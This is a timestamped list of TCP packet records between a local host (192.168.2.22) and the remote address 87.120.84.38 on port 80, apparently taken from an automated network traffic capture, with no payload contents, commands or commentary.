                                                                                                          Oct 30, 2024 08:14:19.160969019 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.160983086 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.160998106 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.161041021 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161077023 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.161395073 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161417961 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161428928 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161448002 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.161473989 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.161514997 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161525965 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161549091 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.161556005 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.161572933 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.161595106 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162058115 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162107944 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162120104 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162130117 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162153959 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162214041 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162250996 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162266016 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162276030 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162302017 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162307978 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162317991 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162328005 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162353039 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162374020 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.162395000 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162404060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.162436008 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320616007 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320660114 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320669889 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320712090 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320722103 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320769072 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320789099 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320791006 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320836067 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320844889 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320854902 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320907116 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320908070 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320945978 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.320950031 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320982933 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.320996046 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321006060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321039915 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321079016 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321089983 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321118116 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321140051 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321155071 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321173906 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321199894 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321203947 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321214914 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321223974 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321245909 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321264982 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321403027 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321410894 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321420908 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321429968 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321440935 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321441889 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321445942 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321472883 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321485043 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321537018 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321547985 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321587086 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321604967 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321615934 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321638107 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321662903 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321731091 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321741104 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321749926 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321762085 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321770906 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321773052 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321795940 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321813107 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321839094 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321923018 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321933031 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321943045 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321953058 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.321965933 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.321995974 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322017908 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322067976 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322103024 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322170973 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322180033 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322189093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322200060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322211027 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322220087 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322221994 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322232962 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322244883 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322256088 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322277069 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322424889 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322434902 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322453022 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322458982 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322463036 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322473049 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322484016 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322489023 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322508097 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322525024 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322658062 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322702885 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322750092 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322760105 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322770119 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322782040 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322792053 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322793007 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322803020 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.322804928 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322827101 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.322845936 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323000908 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323009968 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323019028 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323029041 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323040009 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323051929 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323101044 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323205948 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323216915 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323225021 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323235035 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323245049 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323268890 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323286057 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323386908 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323395014 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323436022 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323463917 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323474884 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323507071 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.323540926 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323550940 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.323580980 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.324233055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324273109 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324281931 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.324282885 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324292898 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324305058 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.324323893 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.324542046 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324578047 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324587107 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.324589968 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.324613094 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.325292110 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325324059 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325341940 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.325360060 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.325484991 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325530052 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.325576067 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325584888 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325609922 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325619936 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.325623035 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.325647116 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326248884 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326267958 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326278925 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326297998 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326301098 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326313972 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326320887 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326323986 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326355934 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326384068 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326395988 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326406002 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326416969 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326425076 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326441050 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326459885 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326539040 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326575994 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326601982 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326617956 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326639891 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326649904 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326659918 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326663971 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326670885 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326680899 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326704025 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326905966 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326944113 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326955080 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326956034 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.326976061 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.326994896 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.327032089 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.327043056 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.327068090 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.327085972 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.327091932 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.327146053 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.327231884 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.327244043 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.327290058 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328172922 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328231096 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328242064 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328253984 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328290939 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328542948 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328555107 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328597069 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328620911 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328658104 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328660011 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328670979 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328701019 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328728914 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328738928 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328769922 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.328804970 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.328845024 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.329813004 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.329858065 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.329866886 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.329901934 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.329920053 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.329952955 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.329963923 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.329976082 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.329994917 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330015898 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330027103 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330038071 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330049992 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330065966 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330085993 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330173969 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330212116 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330240011 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330250025 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330259085 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330271006 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330280066 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330281973 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330293894 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330298901 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330317974 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330338001 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330470085 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330478907 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330511093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330522060 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330523014 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330540895 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330559015 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330661058 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330671072 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330679893 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330688000 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330698013 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330709934 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330713034 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330732107 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330750942 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330799103 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330840111 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330871105 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330882072 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330892086 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.330914974 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.330931902 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331007004 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331016064 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331021070 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331031084 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331043005 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331053972 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331060886 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331079960 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331101894 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331224918 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331233978 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331243992 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331270933 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331288099 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331342936 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331355095 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331376076 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331379890 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331398964 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331410885 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331417084 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331448078 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331475973 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331486940 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331499100 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331510067 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331515074 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331536055 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331682920 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331691980 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331696987 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331707954 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331720114 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331737995 CET4916580192.168.2.2287.120.84.38
